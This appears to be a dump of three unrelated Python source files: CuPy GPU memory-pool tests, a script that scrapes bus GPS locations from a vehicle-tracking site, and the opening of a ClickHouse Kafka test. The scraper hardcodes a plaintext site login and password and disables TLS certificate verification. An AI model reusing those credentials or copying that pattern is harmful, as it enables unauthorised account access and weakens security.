# limit is disabled by default
assert 0 == self.pool.get_limit()
def test_set_limit_size(self):
self.pool.set_limit(size=1024)
assert 1024 == self.pool.get_limit()
self.pool.set_limit(size=2**33)
assert 2**33 == self.pool.get_limit()
self.pool.set_limit(size=0)
assert 0 == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(size=-1)
def test_set_limit_fraction(self):
_, total = cupy.cuda.runtime.memGetInfo()
self.pool.set_limit(fraction=0)
assert 0 == self.pool.get_limit()
self.pool.set_limit(fraction=0.5)
assert total * 0.5 == self.pool.get_limit()
self.pool.set_limit(fraction=1.0)
assert total == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=-1)
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=1.1)
class TestParseMempoolLimitEnvVar(unittest.TestCase):
def test_parse_limit_string(self):
parse_limit_string = memory._parse_limit_string
# size
param = parse_limit_string('0')
assert 0 == param['size']
assert None is param['fraction']
param = parse_limit_string('1073741824')
assert 1073741824 == param['size']
assert None is param['fraction']
# fraction
param = parse_limit_string('0%')
assert None is param['size']
assert 0.0 == param['fraction']
param = parse_limit_string('40%')
assert None is param['size']
assert 0.4 == param['fraction']
param = parse_limit_string('70.5%')
assert None is param['size']
assert 0.705 == param['fraction']
param = parse_limit_string('100%')
assert None is param['size']
assert 1.0 == param['fraction']
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed],
}))
@testing.gpu
class TestMemoryPool(unittest.TestCase):
def setUp(self):
if (
cupy.cuda.runtime.is_hip and
cupy.cuda.driver.get_build_version() < 40300000 and
self.allocator is memory.malloc_managed
):
raise unittest.SkipTest('Managed memory requires ROCm 4.3+')
self.pool = memory.MemoryPool(self.allocator)
def tearDown(self):
self.pool.free_all_blocks()
def test_zero_size_alloc(self):
with cupy.cuda.Device():
mem = self.pool.malloc(0).mem
assert isinstance(mem, memory.Memory)
assert not isinstance(mem, memory.PooledMemory)
def test_double_free(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
mem.free()
mem.free()
def test_free_all_blocks(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
assert isinstance(mem, memory.BaseMemory)
assert isinstance(mem, memory.PooledMemory)
assert self.pool.n_free_blocks() == 0
mem.free()
assert self.pool.n_free_blocks() == 1
self.pool.free_all_blocks()
assert self.pool.n_free_blocks() == 0
def test_free_all_blocks_without_malloc(self):
with cupy.cuda.Device():
# call directly without malloc.
self.pool.free_all_blocks()
assert self.pool.n_free_blocks() == 0
def test_free_all_free(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
assert isinstance(mem, memory.BaseMemory)
assert isinstance(mem, memory.PooledMemory)
assert self.pool.n_free_blocks() == 0
mem.free()
assert self.pool.n_free_blocks() == 1
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
assert self.pool.n_free_blocks() == 0
def test_free_all_free_without_malloc(self):
with cupy.cuda.Device():
# call directly without malloc.
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
assert self.pool.n_free_blocks() == 0
def test_n_free_blocks_without_malloc(self):
with cupy.cuda.Device():
# call directly without malloc/free_all_free.
assert self.pool.n_free_blocks() == 0
def test_used_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.used_bytes()
def test_free_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.free_bytes()
def test_total_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.total_bytes()
# TODO(leofang): test MemoryAsyncPool. We currently remove the test because
# this test class requires the ability of creating a new pool, which we do
# not support yet for MemoryAsyncPool.
@testing.parameterize(*testing.product({
'mempool': ('MemoryPool',),
}))
@testing.gpu
class TestAllocator(unittest.TestCase):
def setUp(self):
if self.mempool == 'MemoryAsyncPool':
if cupy.cuda.runtime.is_hip:
pytest.skip('HIP does not support async allocator')
if cupy.cuda.driver._is_cuda_python():
version = cupy.cuda.runtime.runtimeGetVersion()
else:
version = cupy.cuda.driver.get_build_version()
if version < 11020:
pytest.skip('malloc_async is supported since CUDA 11.2')
if cupy.cuda.runtime.driverGetVersion() < 11030:
pytest.skip('pool statistics is supported with driver 11.3+')
self.old_pool = cupy.get_default_memory_pool()
self.pool = getattr(memory, self.mempool)()
memory.set_allocator(self.pool.malloc)
def tearDown(self):
self.pool.set_limit(size=0)
self.pool.free_all_blocks()
memory.set_allocator(self.old_pool.malloc)
def test_set_allocator(self):
with cupy.cuda.Device():
assert 0 == self.pool.used_bytes()
arr = cupy.arange(128, dtype=cupy.int64)
assert 1024 == arr.data.mem.size
assert 1024 == self.pool.used_bytes()
def test_get_allocator(self):
assert memory.get_allocator() == self.pool.malloc
def test_allocator_context_manager(self):
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
assert memory.get_allocator() == new_pool.malloc
assert memory.get_allocator() == self.pool.malloc
def test_set_allocator_cm(self):
new_pool = memory.MemoryPool()
new_pool2 = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
with self.assertRaises(ValueError):
memory.set_allocator(new_pool2.malloc)
def test_allocator_nested_context_manager(self):
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
new_pool2 = memory.MemoryPool()
assert memory.get_allocator() == new_pool.malloc
with cupy.cuda.using_allocator(new_pool2.malloc):
assert memory.get_allocator() == new_pool2.malloc
assert memory.get_allocator() == new_pool.malloc
assert memory.get_allocator() == self.pool.malloc
def test_allocator_thread_local(self):
barrier = threading.Barrier(2)
def thread_body(self):
cupy.cuda.Device().use()
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
assert memory.get_allocator() == new_pool.malloc
barrier.wait()
arr = cupy.zeros(128, dtype=cupy.int64)
barrier.wait()
assert arr.data.mem.size == new_pool.used_bytes()
barrier.wait()
assert memory.get_allocator() == self.pool.malloc
self._success = True
with cupy.cuda.Device():
self._success = False
t = threading.Thread(target=thread_body, args=(self,), daemon=True)
t.start()
barrier.wait()
assert memory.get_allocator() == self.pool.malloc
arr = cupy.ones(256, dtype=cupy.int64)
barrier.wait()
assert arr.data.mem.size == self.pool.used_bytes()
barrier.wait()
t.join()
assert self._success
def test_thread_local_valid(self):
new_pool = memory.MemoryPool()
arr = None
with cupy.cuda.using_allocator(new_pool.malloc):
arr = cupy.zeros(128, dtype=cupy.int64)
arr += 1
# Check that arr and the pool have not ben released
assert arr.data.mem.size == new_pool.used_bytes()
assert arr.sum() == 128
def _reuse_between_thread(self, stream_main, stream_sub):
new_pool = memory.MemoryPool()
def job(stream):
cupy.cuda.Device().use()
with cupy.cuda.using_allocator(new_pool.malloc):
with stream:
arr = cupy.arange(16)
self._ptr = arr.data.ptr
del arr
self._error = False
# Run in main thread.
self._ptr = -1
self._error = True
job(stream_main)
assert not self._error
main_ptr = self._ptr
# Run in sub thread.
self._ptr = -1
self._error = True
with cupy.cuda.Device():
t = threading.Thread(target=job, args=(stream_sub,))
t.daemon = True
t.start()
t.join()
assert not self._error
return main_ptr, self._ptr
def test_reuse_between_thread(self):
stream = cupy.cuda.Stream.null
main_ptr, sub_ptr = self._reuse_between_thread(stream, stream)
assert main_ptr == sub_ptr
def test_reuse_between_thread_same_stream(self):
stream = cupy.cuda.Stream()
main_ptr, sub_ptr = self._reuse_between_thread(stream, stream)
assert main_ptr == sub_ptr
def test_reuse_between_thread_different_stream(self):
stream1 = cupy.cuda.Stream()
stream2 = cupy.cuda.Stream()
main_ptr, sub_ptr = self._reuse_between_thread(stream1, stream2)
assert main_ptr != sub_ptr
@pytest.mark.skipif(cupy.cuda.runtime.is_hip, reason='No PTDS on HIP')
def test_reuse_between_thread_ptds(self):
stream = cupy.cuda.Stream.ptds
main_ptr, sub_ptr = self._reuse_between_thread(stream, stream)
assert main_ptr != sub_ptr
@testing.gpu
class TestAllocatorDisabled(unittest.TestCase):
def setUp(self):
self.pool = cupy.get_default_memory_pool()
def tearDown(self):
memory.set_allocator(self.pool.malloc)
def _check_pool_not_used(self):
used_bytes = self.pool.used_bytes()
with cupy.cuda.Device():
arr = cupy.arange(128, dtype=cupy.int64)
assert 0 == self.pool.used_bytes() - used_bytes
del arr
def test(self):
memory.set_allocator()
self._check_pool_not_used()
def test_none(self):
memory.set_allocator(None)
self._check_pool_not_used()
class PythonAllocator(object):
def __init__(self):
self.malloc_called = False
self.free_called = False
def malloc(self, size, device_id):
self.malloc_called = True
return cupy.cuda.runtime.malloc(size)
def free(self, size, device_id):
self.free_called = True
cupy.cuda.runtime.free(size)
@testing.gpu
class TestPythonFunctionAllocator(unittest.TestCase):
def setUp(self):
self.old_pool = cupy.get_default_memory_pool()
self.alloc = PythonAllocator()
python_alloc = memory.PythonFunctionAllocator(
self.alloc.malloc, self.alloc.free)
memory.set_allocator(python_alloc.malloc)
def tearDown(self):
memory.set_allocator(self.old_pool.malloc)
def test_allocator(self):
assert not self.alloc.malloc_called and not self.alloc.free_called
cupy.zeros(10)
assert self.alloc.malloc_called and self.alloc.free_called
@testing.gpu
class TestMemInfo(unittest.TestCase):
def test_mem_info(self):
d = cupy.cuda.Device()
mem_info = d.mem_info
assert isinstance(mem_info, tuple)
assert len(mem_info) == 2
assert all(isinstance(m, int) for m in mem_info)
assert all(m > 0 for m in mem_info)
@testing.gpu
class TestLockAndNoGc(unittest.TestCase):
def test(self):
lock = fastrlock.rlock.FastRLock()
ctx = memory.LockAndNoGc(lock)
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
with ctx:
assert not gc.isenabled()
lock.release()
lock.acquire()
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
class TestExceptionPicklable(unittest.TestCase):
def test(self):
e1 = memory.OutOfMemoryError(124, 1024, 1024)
e2 = pickle.loads(pickle.dumps(e1))
assert e1.args == e2.args
assert str(e1) == str(e2)
@testing.gpu
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support async allocator')
@pytest.mark.skipif(cupy.cuda.driver._is_cuda_python()
and cupy.cuda.runtime.runtimeGetVersion() < 11020,
reason='malloc_async is supported since CUDA 11.2')
@pytest.mark.skipif(not cupy.cuda.driver._is_cuda_python()
and cupy.cuda.driver.get_build_version() < 11020,
reason='malloc_async is supported since CUDA 11.2')
class TestMallocAsync(unittest.TestCase):
def setUp(self):
self.old_pool = cupy.get_default_memory_pool()
memory.set_allocator(memory.malloc_async)
def tearDown(self):
memory.set_allocator(self.old_pool.malloc)
def _check_pool_not_used(self):
used_bytes = self.old_pool.used_bytes()
with cupy.cuda.Device():
arr = cupy.arange(128, dtype=cupy.int64)
assert 0 == self.old_pool.used_bytes() - used_bytes
del arr
def test(self):
self._check_pool_not_used()
def test_stream1(self):
# Check: pool is not used when on a stream
s = cupy.cuda.Stream()
with s:
self._check_pool_not_used()
def test_stream2(self):
# Check: the memory was allocated on the right stream
s = cupy.cuda.Stream()
with s:
memptr = memory.alloc(100)
assert memptr.mem.stream_ref().ptr == s.ptr
def test_stream3(self):
# Check: destory stream does not affect memory deallocation
s = cupy.cuda.Stream()
with s:
memptr = memory.alloc(100)
del s
gc.collect()
del memptr
def test_stream4(self):
# Check: free on the same stream
s = cupy.cuda.Stream()
with s:
memptr = memory.alloc(100)
del memptr
def test_stream5(self):
# Check: free on another stream
s1 = cupy.cuda.Stream()
with s1:
memptr = memory.alloc(100)
del s1
s2 = cupy.cuda.Stream()
with s2:
del memptr
@testing.gpu
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support async allocator')
@pytest.mark.skipif(cupy.cuda.driver._is_cuda_python()
and cupy.cuda.runtime.runtimeGetVersion() < 11020,
reason='malloc_async is supported since CUDA 11.2')
@pytest.mark.skipif(not cupy.cuda.driver._is_cuda_python()
and cupy.cuda.driver.get_build_version() < 11020,
reason='malloc_async is supported since CUDA 11.2')
class TestMemoryAsyncPool(unittest.TestCase):
def setUp(self):
self.pool = memory.MemoryAsyncPool()
self.unit = memory._allocation_unit_size
self.stream = stream_module.Stream()
self.stream_ident = self.stream.ptr
cupy.get_default_memory_pool().free_all_blocks()
cupy.cuda.Device().synchronize()
def tearDown(self):
self.pool.set_limit(size=0)
self.pool.free_all_blocks()
def test_zero_size_alloc(self):
with cupy.cuda.Device():
mem = self.pool.malloc(0).mem
assert isinstance(mem, memory.MemoryAsync)
assert not isinstance(mem, memory.PooledMemory)
def test_alloc(self):
with cupy.cuda.Device():
mem = self.pool.malloc(100).mem
assert isinstance(mem, memory.MemoryAsync)
assert not isinstance(mem, memory.PooledMemory)
@testing.slow
def test_alloc_large_chunk(self):
self.pool.free_all_blocks()
with cupy.cuda.Device() as d:
_, mem_total = d.mem_info
mem = self.pool.malloc(int(0.7 * mem_total)).mem # 70% memory
del mem
mem = self.pool.malloc(int(0.3 * mem_total)).mem # 30% memory # noqa
def test_free_all_blocks(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
del mem
self.pool.free_all_blocks()
@testing.slow
def test_free_all_blocks_large_chunk(self):
# When memory is returned to the async mempool, it is not immediately
# visible to normal malloc routines until after a sync happens.
default_pool = cupy.get_default_memory_pool()
with cupy.cuda.Device() as d:
_, mem_total = d.mem_info
mem = self.pool.malloc(int(0.7 * mem_total)).mem # 70% memory
del mem
with pytest.raises(memory.OutOfMemoryError):
default_pool.malloc(int(0.3 * mem_total)) # 30% memory
self.pool.free_all_blocks() # synchronize
default_pool.malloc(int(0.3 * mem_total)) # this time it'd work
@testing.slow
def test_interaction_with_CuPy_default_pool(self):
# Test saneness of cudaMallocAsync
default_pool = cupy.get_default_memory_pool()
with cupy.cuda.Device() as d:
_, mem_total = d.mem_info
mem = default_pool.malloc(int(0.7 * mem_total)).mem # 70% memory
del mem
with pytest.raises(memory.OutOfMemoryError):
self.pool.malloc(int(0.3 * mem_total)) # 30% memory
default_pool.free_all_blocks()
self.pool.malloc(int(0.3 * mem_total)) # this time it'd work
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='used_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_used_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.used_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='used_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_used_bytes2(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.used_bytes()
del p2
assert self.unit * 2 == self.pool.used_bytes()
del p1
assert self.unit * 0 == self.pool.used_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 1 == self.pool.used_bytes()
del p3
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='used_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_used_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
del p2
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='free_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_free_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.free_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='free_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_free_bytes2(self):
# Note: MemoryAsyncPool works differently from MemoryPool. The first
# allocation would be much bigger than requested, and the pool size
# increases as needed. As a result, this test method is very different
# from TestSingleDeviceMemoryPool.test_free_bytes(), in that the pool
# size is a fixed value (outside of our control).
p1 = self.pool.malloc(self.unit * 2)
assert self.pool.free_bytes() == (
self.pool.total_bytes() - self.pool.used_bytes()) # always true
# current_size is fixed throughout this test, as no synchronization
# (such as free_all_blocks()) is done
current_size = self.pool.total_bytes()
free_size = self.pool.free_bytes()
p2 = self.pool.malloc(self.unit * 4)
free_size -= self.unit * 4
assert self.pool.free_bytes() == free_size
del p2
free_size += self.unit * 4
assert self.pool.free_bytes() == free_size
del p1
free_size += self.unit * 2
assert self.pool.free_bytes() == free_size
p3 = self.pool.malloc(self.unit * 1)
free_size -= self.unit * 1
assert self.pool.free_bytes() == free_size
del p3
assert self.pool.total_bytes() == current_size
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='free_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_free_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.pool.free_bytes() == (
self.pool.total_bytes() - self.pool.used_bytes()) # always true
del p2
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='total_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_total_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.total_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='total_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_total_bytes2(self):
# Note: MemoryAsyncPool works differently from MemoryPool. The first
# allocation would be much bigger than requested, and the pool size
# increases as needed. As a result, this test method is very different
# from TestSingleDeviceMemoryPool.test_total_bytes(), in that the pool
# size is either 0 or a fixed value (outside of our control).
p1 = self.pool.malloc(self.unit * 2)
current_size = self.pool.total_bytes()
assert current_size == self.pool.total_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert current_size == self.pool.total_bytes()
del p1
assert current_size == self.pool.total_bytes()
del p2
assert current_size == self.pool.total_bytes()
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert current_size == self.pool.total_bytes()
assert (self.pool.used_bytes() + self.pool.free_bytes()
== self.pool.total_bytes())
del p3
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='total_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_total_bytes_stream(self):
# Note: MemoryAsyncPool works differently from MemoryPool. The first
# allocation would be much bigger than requested, and the pool size
# increases as needed. As a result, this test method is very different
# from TestSingleDeviceMemoryPool.test_total_bytes_stream(), in that
# the pool size is either 0 or a fixed value (outside of our control).
p1 = self.pool.malloc(self.unit * 4)
current_size = self.pool.total_bytes()
assert current_size > 0
del p1
assert current_size > 0
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert current_size == self.pool.total_bytes()
del p2
def test_get_limit(self):
# limit is disabled by default
assert 2**64-1 == self.pool.get_limit()
def test_set_limit_size(self):
self.pool.set_limit(size=1024)
assert 1024 == self.pool.get_limit()
self.pool.set_limit(size=2**33)
assert 2**33 == self.pool.get_limit()
self.pool.set_limit(size=0)
assert 2**64-1 == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(size=-1)
def test_set_limit_fraction(self):
_, total = cupy.cuda.runtime.memGetInfo()
self.pool.set_limit(fraction=0)
assert 2**64-1 == self.pool.get_limit()
self.pool.set_limit(fraction=0.5)
assert total * 0.5 == self.pool.get_limit()
self.pool.set_limit(fraction=1.0)
assert total == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=-1)
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=1.1)
|
get_coords.py
|
import requests
import json
from selenium import webdriver
import csv
from time import sleep
from datetime import date,timedelta
from threading import Thread
from concurrent.futures import ThreadPoolExecutor
import os
from reverse_geocoding import *
import urllib3
urllib3.disable_warnings()
progress_count = 0
#Bus id
# For SAM series : 272 + bus-number
# For ABP series : 666 + bus-number
# For ARR series : 509 + bus-number
# For ATP series : 717 + bus-number
# For CSR series : 523 + bus-number
# For SMD series : 761 + bus-number
# For SMT series : 804 + bus-number
# For TBO series : 848 + bus-number
# For TKR series : 507 + bus-number
# For ARM series : 355 + bus-number
# For CSM series : 376 + bus-number
# For TKM series : 361 + bus-number
#hours --> hours-6 (if -ve start reducing from 24)
# eg:
# 22 --> 16
# 5 --> 23
#minutes --> tens digit - 3 (if -ve start reducing from 6)
# eg:
# 42 --> 12
# 22 --> 42
class CoordinateSearch:
def __init__(self,cookie=None,bus_name="",interval=10,date=0,id=0):
print('Search for {} started'.format(bus_name))
if cookie is None:
with open('cookies.log','r') as file:
self.cookie = file.read()
else:
self.cookie = cookie
self.progress = 0
self.id = id
self.ids = {'SAM':272,
'ABP':666,
'ARR':509,
'ATP':717,
'CSR':523,
'SMD':761,
'SMT':804,
'TBO':848,
'TKR':507,
'ARM':355,
'CSM':376,
'TKM':361}
self.date = date
self.hour_counter = 8
self.name = bus_name
# self.id = self.get_id(bus_name)
self.data_list = []
# self.data_list.append(['Date','Time','Latitude','Longitude'])
self.interval = interval
self.data = {}
self.cookies_arg = {'JSESSIONID':self.cookie}
self.data_arg = {"type":"ASSET","ids":[self.id],"start":"2020-03-16T16:36:39.000Z","end":"2020-03-16T16:37:40.000Z","rtl":False}
self.headers_arg = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'en-US,en;q=0.5',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/json;charset=utf-8',
'Referer':'https://ajlavls.in/abpp/',
'Connection':'close',
'Origin':'https://ajlavls.in'}
def change_args(self,**kwargs):
# self.data_arg[kwargs.keys()[0]] = kwargs[kwargs.keys()[0]]
for key in kwargs.keys():
self.data_arg[key] = kwargs[key]
def get_cookie(self):
self.driver = webdriver.Chrome()
self.driver.get("https://ajlavls.in/abpp/#/login")
sleep(3)
self.driver.find_element_by_xpath("/html/body/div/div/div/div/div[2]/div[2]/form/div[1]/input").send_keys('A_Yhonk')
self.driver.find_element_by_xpath("/html/body/div/div/div/div/div[2]/div[2]/form/div[2]/input").send_keys('A_Yhonk@123')
self.driver.find_element_by_xpath("/html/body/div/div/div/div/div[2]/div[2]/form/div[3]/div/input").click()
sleep(3)
cookies = self.driver.get_cookies()
with open('cookies.log','w') as file:
file.write(str(cookies[0]['value']))
self.cookie = str(cookies[0]['value'])
self.cookies_arg = {'JSESSIONID':self.cookie}
self.driver.close()
self.start()
def get_id(self,name):
# bus_number = int(name[3:])
# bus_series = name[:3]
# return (self.ids[bus_series] + bus_number)
return 559
def start(self):
self.get_data(self.date,self.date,'08:00:00','08:01:00')
def tune_data(self,date,time):
start = date + "T"
data = time.split(":")
hour = int(data[0])
minutes = data[1]
seconds = str(data[2])
tmp = hour - 6
if tmp < 0:
h = 24 + tmp
else:
h = tmp
start += str(h)
#Minutes
tmp = int(minutes[0]) - 3
if tmp < 0:
h = 6 + tmp
else:
h = tmp
h2 = str(h) + minutes[1]
start += ':' + h2 + ':' + seconds + '.000Z'
# print(start)
return start
def get_data(self,from_date,to_date,from_time,to_time):
if self.hour_counter >= 20:
return
start = self.tune_data(from_date,from_time)
end = self.tune_data(to_date,to_time)
self.change_args(start=start,end=end)
req = requests.post('https://ajlavls.in/abpp/rest/mrt',verify=False,data=json.dumps(self.data_arg),
headers=self.headers_arg,cookies=self.cookies_arg)
if req.status_code == 405 or req.status_code == 400:
self.get_cookie()
return
data = json.loads(req.text)
try:
longitude = data['assets'][str(self.id)]['logs'][0]['lon']
latitude = data['assets'][str(self.id)]['logs'][0]['lat']
except Exception as e:
latitude = 0
longitude = 0
with open('logs.txt','a') as f:
f.write(str(e) + '\n')
self.data[from_date + " " + self.change(from_time)] = [latitude,longitude]
self.data_list.append([from_date,self.change(from_time),latitude,longitude])
self.progress += 1
# print('{}% done'.format(str((self.progress/72)*100)[:4]))
self.get_next(from_date,to_date,from_time,to_time)
def change(self,time):
data = time.split(':')
data[0] = str(self.hour_counter)
return ':'.join(data)
def get_next(self,from_date,to_date,from_time,to_time):
data = from_time.split(":")
hour = int(data[0])
minutes = int(data[1])
seconds = str(data[2])
tmp = minutes + 10
if tmp == 30:
hour += 1
if tmp >= 60:
minutes = '00'
self.hour_counter += 1
from_time = str(hour) + ':' + '00' + ':' + str(seconds)
to_time = str(hour) + ':' + '01' + ':' + str(seconds)
else:
minutes = tmp
from_time = str(hour) + ':' + str(minutes) + ':' + str(seconds)
to_time = str(hour) + ':' + str(int(minutes)+1) + ':' + str(seconds)
self.get_data(from_date,to_date,from_time,to_time)
def extract_data(self,List=False):
if List:
return self.data_list
else:
return self.data
# main = CoordinateSearch(cookie="01B23455F0C58D44BB3A9E09A17E1FB3",
# bus_name="ARR27",date="2020-03-17")
# main = CoordinateSearch(bus_name="ARR27",date="2020-03-17")
# main.start()
# with open('SAM8.csv','w') as f:
# writer = csv.writer(f)
# writer.writerows(main.extract_data(List=True))
def start(bus,id,dates):
global progress_count
main_data = []
csv_data = [
['Date','Time','Latitude','Longitude']
]
for date in dates:
main = CoordinateSearch(bus_name=bus,date=date,id=id)
main.start()
main_data.append(main.extract_data(List=True))
for i in main_data:
for x in i:
csv_data.append(x)
# os.chdir('Data')
with open('{}.csv'.format(bus),'w') as file:
csv_writer = csv.writer(file)
csv_writer.writerows(csv_data)
progress_count += 1
print("[*] {}/100 buses done".format(str(progress_count)))
def main():
thread_pool = ThreadPoolExecutor(max_workers=10)
start_date = str(input("Please enter start date (YYYY-MM-DD) : ")).split('-')
start_date = date(int(start_date[0]),int(start_date[1]),int(start_date[2]))
end_date = str(input("Please enter end date (YYYY-MM-DD) : ")).split('-')
end_date = date(int(end_date[0]),int(end_date[1]),int(end_date[2]))
delta = end_date - start_date
dates = []
for i in range(delta.days + 1):
day = start_date + timedelta(days=i)
dates.append(str(day))
with open('buses.txt','r') as file:
for line in file.readlines():
data = line.split(',')
thread_pool.submit(start,data[0],int(data[1]),dates)
# search_thread = Thread(target=start,args=(data[0],int(data[1]),dates))
# search_thread.start()
# print('[*] Search for {} started'.format(data[0]))
# search_thread.join()
thread_pool.shutdown()
if __name__ == '__main__':
main()
|
test.py
|
import json
import os.path as p
import random
import socket
import threading
import time
import logging
import io
import string
import ast
import math
import avro.schema
import avro.io
import avro.datafile
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.protocol.admin import DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
from kafka.admin import NewTopic
# protoc --version
# libprotoc 3.0.0
# # to create kafka_pb2.py
# protoc --python_out=. kafka.proto
from . import kafka_pb2
from . import social_pb2
from . import message_with_repeated_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml', 'configs/named_collection.xml'],
user_configs=['configs/users.xml'],
with_kafka=True,
with_zookeeper=True, # For Replicated Table
macros={"kafka_broker":"kafka1",
"kafka_topic_old":"old",
"kafka_group_name_old":"old",
"kafka_topic_new":"new",
"kafka_group_name_new":"new",
"kafka_client_id":"instance",
"kafka_format_json_each_row":"JSONEachRow"},
clickhouse_path_dir='clickhouse_path')
def get_kafka_producer(port, serializer, retries):
errors = []
for _ in range(retries):
try:
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(port), value_serializer=serializer)
logging.debug("Kafka Connection establised: localhost:{}".format(port))
return producer
except Exception as e:
errors += [str(e)]
time.sleep(1)
raise Exception("Connection not establised, {}".format(errors))
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
def kafka_create_topic(admin_client, topic_name, num_partitions=1, replication_factor=1, max_retries=50, config=None):
logging.debug(f"Kafka create topic={topic_name}, num_partitions={num_partitions}, replication_factor={replication_factor}")
topics_list = [NewTopic(name=topic_name, num_partitions=num_partitions, replication_factor=replication_factor, topic_configs=config)]
retries = 0
while True:
try:
admin_client.create_topics(new_topics=topics_list, validate_only=False)
logging.debug("Admin client succeed")
return
except Exception as e:
retries += 1
time.sleep(0.5)
if retries < max_retries:
logging.warning(f"Failed to create topic {e}")
else:
raise
def kafka_delete_topic(admin_client, topic, max_retries=50):
result = admin_client.delete_topics([topic])
for (topic, e) in result.topic_error_codes:
if e == 0:
logging.debug(f"Topic {topic} deleted")
else:
logging.error(f"Failed to delete topic {topic}: {e}")
retries = 0
while True:
topics_listed = admin_client.list_topics()
logging.debug(f"TOPICS LISTED: {topics_listed}")
if topic not in topics_listed:
return
else:
retries += 1
time.sleep(0.5)
if retries > max_retries:
raise Exception(f"Failed to delete topics {topic}, {result}")
def kafka_produce(kafka_cluster, topic, messages, timestamp=None, retries=15):
logging.debug("kafka_produce server:{}:{} topic:{}".format("localhost", kafka_cluster.kafka_port, topic))
producer = get_kafka_producer(kafka_cluster.kafka_port, producer_serializer, retries)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
## just to ensure the python client / producer is working properly
def kafka_producer_send_heartbeat_msg(max_retries=50):
kafka_produce(kafka_cluster, 'test_heartbeat_topic', ['test'], retries=max_retries)
def kafka_consume(kafka_cluster, topic, needDecode = True, timestamp = 0):
consumer = KafkaConsumer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), auto_offset_reset="earliest")
consumer.subscribe(topics=(topic))
